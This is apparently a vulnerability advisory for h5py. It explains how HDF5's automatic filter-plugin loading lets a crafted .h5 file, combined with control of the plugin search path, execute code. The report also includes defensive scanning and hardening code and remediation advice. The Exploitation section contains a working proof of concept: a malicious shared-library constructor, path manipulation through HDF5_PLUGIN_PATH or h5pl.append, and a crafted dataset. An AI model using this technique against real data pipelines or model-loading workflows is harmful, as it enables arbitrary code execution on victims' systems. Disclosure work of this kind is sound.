	# Arbitrary Code Execution via Automatic HDF5 Filter Plugin Loading in h5py

	## Target
	- Project: h5py/h5py
	- URL: https://github.com/h5py/h5py
	- Component: HDF5 filter pipeline / dataset read path
	- CWE: CWE-94 (Improper Control of Generation of Code ('Code Injection'))

	## Severity: HIGH

	## Summary

	When h5py reads a dataset that uses a custom (non-built-in) compression filter, the underlying HDF5 library automatically searches the plugin search path for a shared library (`.so`/`.dll`) filter plugin and loads it. h5py exposes APIs (`h5py.h5pl`) to manipulate this search path but offers no way to restrict or disable the automatic loading. A crafted HDF5 file that specifies a custom filter ID therefore causes HDF5 to load, and execute code from, a shared library found in the plugin search path. That path can be controlled through the `HDF5_PLUGIN_PATH` environment variable or through the `h5py.h5pl.append()`/`prepend()` APIs.

	## Vulnerable Code

	### File: `h5py/h5py/h5z.pyx` (lines 102-121)

	```python
	@with_phil
	def register_filter(uintptr_t cls_pointer_address):
	    '''(INT cls_pointer_address) => BOOL

	    Register a new filter from the memory address of a buffer containing a
	    ``H5Z_class1_t`` or ``H5Z_class2_t`` data structure describing the filter.

	    `cls_pointer_address` can be retrieved from a HDF5 filter plugin dynamic
	    library::

	        import ctypes

	        filter_clib = ctypes.CDLL("/path/to/my_hdf5_filter_plugin.so")
	        filter_clib.H5PLget_plugin_info.restype = ctypes.c_void_p

	        h5py.h5z.register_filter(filter_clib.H5PLget_plugin_info())

	    '''
	    return <int>H5Zregister(<const void *>cls_pointer_address) >= 0
	```

	### File: `h5py/h5py/h5pl.pyx` (lines 20-25)

	```python
	cpdef append(const char* search_path):
	    """(STRING search_path)
	    Add a directory to the end of the plugin search path.
	    """
	    H5PLappend(search_path)
	```

	### File: `h5py/h5py/_hl/filters.py` (lines 295-299)

	When a dataset is created with an integer filter ID, h5py passes it directly to HDF5:
	```python
	elif isinstance(compression, int):
	    if not allow_unknown_filter and not h5z.filter_avail(compression):
	        raise ValueError("Unknown compression filter number: %s" % compression)
	    plist.set_filter(compression, h5z.FLAG_OPTIONAL, compression_opts)
	```

	### Automatic Plugin Loading (HDF5 library behavior)

	When `H5Dread()` is called on a dataset whose filter ID is not currently registered, HDF5 searches the plugin path for `.so`/`.dll` files, loads each candidate with `dlopen()` (`LoadLibrary` on Windows), calls its `H5PLget_plugin_info()` to obtain the filter class, and registers a matching filter automatically. In h5py this happens transparently inside the following calls:

	- `h5py/h5py/_proxy.templ.pyx` line 120: `H5Dread(dset, mtype, mspace, fspace, dxpl, progbuf)`
	- `h5py/h5py/_proxy.templ.pyx` line 151: `H5Dread(dset, dstype, cspace, fspace, dxpl, conv_buf)`
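Because the filter IDs are stored in each dataset's creation property list, a file can be screened before any `H5Dread()` call is made. The following is a minimal sketch, not an h5py feature: the helper names (`non_builtin_filters`, `dataset_filter_ids`, `scan_file`) are hypothetical, and it assumes that reading the creation property list does not itself invoke the filter pipeline.

```python
# Filter IDs implemented by the HDF5 library itself: deflate, shuffle,
# fletcher32, szip, n-bit, scale-offset. Anything else needs a filter that
# was registered separately or loaded as a plugin.
BUILTIN_FILTER_IDS = frozenset({1, 2, 3, 4, 5, 6})


def non_builtin_filters(filter_ids, trusted=frozenset()):
    """Return the IDs that are neither HDF5 built-ins nor explicitly trusted."""
    return sorted(set(filter_ids) - BUILTIN_FILTER_IDS - set(trusted))


def dataset_filter_ids(dset):
    """Read filter IDs from a dataset's creation property list (no data read)."""
    plist = dset.id.get_create_plist()
    # get_filter(i) returns (filter code, flags, values, name); keep the code.
    return [plist.get_filter(i)[0] for i in range(plist.get_nfilters())]


def scan_file(path, trusted=frozenset()):
    """Map dataset name -> flagged filter IDs for every dataset in `path`."""
    import h5py  # imported lazily so the helpers above work without h5py

    findings = {}

    def visit(name, obj):
        if isinstance(obj, h5py.Dataset):
            flagged = non_builtin_filters(dataset_filter_ids(obj), trusted)
            if flagged:
                findings[name] = flagged

    with h5py.File(path, "r") as f:
        f.visititems(visit)
    return findings
```

A caller might reject any file for which `scan_file(path)` returns a non-empty mapping. h5py registers its bundled LZF filter under ID 32000 at import time, so that ID is a natural candidate for the `trusted` set.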

	## Exploitation

	### Attack Scenario 1: Crafted HDF5 file + environment manipulation

	1. An attacker sets `HDF5_PLUGIN_PATH` to a directory they control (e.g., via `.bashrc` manipulation, Docker environment, or CI/CD configuration)
	2. They place a malicious `.so` file in that directory implementing the `H5PLget_plugin_info` symbol
	3. They provide a crafted HDF5 file with a dataset using a custom filter ID matching their plugin
	4. When the victim opens the file and reads the dataset with h5py, the malicious shared library is automatically loaded and its code executes
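Step 2 depends on the attacker being able to write into a directory on the search path. A defender can check for that condition with a short audit such as the sketch below. The function names are hypothetical, and `/usr/local/hdf5/lib/plugin` is the documented Unix default, which individual HDF5 builds may override.

```python
import os
import stat

# Assumed Unix default when HDF5_PLUGIN_PATH is unset; builds can override it.
DEFAULT_PLUGIN_DIR = "/usr/local/hdf5/lib/plugin"


def plugin_dirs(env=None):
    """Directories HDF5 would be expected to search, from HDF5_PLUGIN_PATH."""
    env = os.environ if env is None else env
    raw = env.get("HDF5_PLUGIN_PATH")
    if raw is None:
        return [DEFAULT_PLUGIN_DIR]
    # Entries are separated by ':' on Unix and ';' on Windows (os.pathsep).
    return [p for p in raw.split(os.pathsep) if p]


def loosely_writable(path):
    """True if `path` exists and is writable by group or others."""
    try:
        mode = os.stat(path).st_mode
    except OSError:
        return False
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit(env=None):
    """Return plugin directories that other local users could write to."""
    return [d for d in plugin_dirs(env) if loosely_writable(d)]
```

Running `audit()` at service start-up and refusing to continue when it returns anything is one possible policy. The check only covers POSIX permission bits, so ACLs and writable parent directories would need separate handling.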

	### Attack Scenario 2: h5pl API abuse in shared environments

	In applications where an untrusted party can influence the plugin path through `h5py.h5pl.append()` before a file is loaded, the same effect is achieved without touching the environment:

	```python
	import h5py

	# Attacker injects malicious plugin path
	h5py.h5pl.append(b'/attacker/controlled/path')

	# Later, when legitimate code reads a crafted HDF5 file:
	with h5py.File('crafted.h5', 'r') as f:
	    data = f['dataset'][:]  # Triggers plugin loading -> RCE
	```
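An application can guard against this by snapshotting the in-process search path just before reading and comparing it with an allow-list. The sketch below assumes `h5py.h5pl.size()` and `h5py.h5pl.get()` return the number of entries and each entry as bytes; the helper names and the allow-list contents are hypothetical.

```python
import os


def unexpected_plugin_dirs(entries, allowed):
    """Return search-path entries (as str) that are not in the allow-list."""
    def norm(p):
        # Accept bytes or str and strip trailing slashes / redundant parts.
        return os.path.normpath(os.fsdecode(p))

    allowed_norm = {norm(p) for p in allowed}
    return [e for e in (norm(e) for e in entries) if e not in allowed_norm]


def current_plugin_path():
    """Snapshot HDF5's in-process plugin search path via h5py.h5pl."""
    from h5py import h5pl  # imported lazily; requires h5py at call time

    return [h5pl.get(i) for i in range(h5pl.size())]
```

A reader function could call `unexpected_plugin_dirs(current_plugin_path(), allowed=[...])` and raise if the result is non-empty. This detects tampering through `h5pl` but does not prevent a plugin from being loaded from a directory that is on the allow-list.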

	### Proof of Concept

	```python
	import os

	# Step 1: Build a shared library to act as the filter plugin.
	# In practice, compile a .so with H5PLget_plugin_info that runs arbitrary code.
	# For demonstration, this would be:
	#   gcc -shared -o malicious_filter.so -fPIC malicious_filter.c
	# where malicious_filter.c contains:
	#   #include <stdlib.h>
	#   void __attribute__((constructor)) init() { system("id > /tmp/pwned"); }

	# Step 2: Set the plugin path. Depending on the HDF5 version, the variable
	# may be read only once, at library initialization, so it is set before
	# h5py is imported.
	os.environ['HDF5_PLUGIN_PATH'] = '/tmp/malicious_plugins'

	import h5py
	import numpy as np

	# Step 3: Create an HDF5 file with a custom filter.
	# The ID must not already be registered. 32000 is h5py's bundled LZF filter,
	# so an ID from HDF5's 256-511 testing range is used instead.
	CUSTOM_FILTER_ID = 257

	with h5py.File('/tmp/crafted.h5', 'w') as f:
	    # Use allow_unknown_filter to bypass the availability check during creation
	    f.create_dataset(
	        'payload',
	        data=np.zeros(100),
	        compression=CUSTOM_FILTER_ID,
	        compression_opts=(0,),
	        chunks=(100,),
	        allow_unknown_filter=True
	    )

	# Step 4: When any user reads this file, the filter plugin is loaded
	with h5py.File('/tmp/crafted.h5', 'r') as f:
	    data = f['payload'][:]  # This triggers automatic plugin search and dlopen()
	```

	## Impact

	- Arbitrary code execution in the context of the process reading the HDF5 file.
	- This is particularly dangerous in:
	  - Data science pipelines that process untrusted HDF5 files
	  - ML model loading (Keras/TensorFlow models saved in the `.h5` format are HDF5 files)
	  - Scientific data sharing workflows
	  - Jupyter notebook environments processing external data
	- h5py provides no mechanism to disable automatic filter plugin loading.
	- The `allow_unknown_filter=True` parameter on dataset creation exists to let a file reference a filter that is not available at write time, so files that depend on plugin filters are an explicitly supported use case.

	## Remediation

	1. Provide an option to disable automatic filter plugin loading when opening files for reading. HDF5 provides `H5PLset_loading_state()` (available since HDF5 1.8.15) to turn plugin loading off.
	2. Add a security warning to the documentation about the risks of processing untrusted HDF5 files.
	3. Consider disabling plugin loading by default for read-only file access and requiring explicit opt-in.
	4. Validate or restrict plugin paths added via `h5pl.append()`/`prepend()`.
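
Until h5py offers such an option, a caller can lean on HDF5's own `HDF5_PLUGIN_PRELOAD` environment variable: the HDF5 documentation describes the special value `::` as disabling dynamic plugin loading. The sketch below is a minimal illustration, not part of h5py. The helper name `disable_hdf5_plugins` is hypothetical, and it assumes the variable is read when the HDF5 library initializes, so it has to be set before `import h5py`.

```python
import os
import sys

# HDF5 treats this exact value of HDF5_PLUGIN_PRELOAD as "no plugins".
NO_PLUGINS = "::"


def disable_hdf5_plugins(env=None, loaded_modules=None):
    """Ask HDF5 to skip dynamic plugin loading for this process.

    Assumption: the variable is only consulted at library initialization,
    so this refuses to run once h5py has already been imported.
    """
    env = os.environ if env is None else env
    loaded_modules = sys.modules if loaded_modules is None else loaded_modules
    if "h5py" in loaded_modules:
        raise RuntimeError("h5py is already imported; call this earlier")
    env["HDF5_PLUGIN_PRELOAD"] = NO_PLUGINS
```

Calling `disable_hdf5_plugins()` at the very top of an entry point, followed by `import h5py`, is the intended usage. With loading disabled, datasets that legitimately rely on plugin filters are expected to fail to read, so this suits pipelines that only accept built-in compression.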

	## References

	- HDF5 Dynamic Plugin Loading: https://docs.hdfgroup.org/hdf5/develop/group___h5_p_l.html
	- HDF5 Filter Plugins: https://github.com/HDFGroup/hdf5_plugins
	- h5py filter documentation: https://docs.h5py.org/en/stable/high/dataset.html#filter-pipeline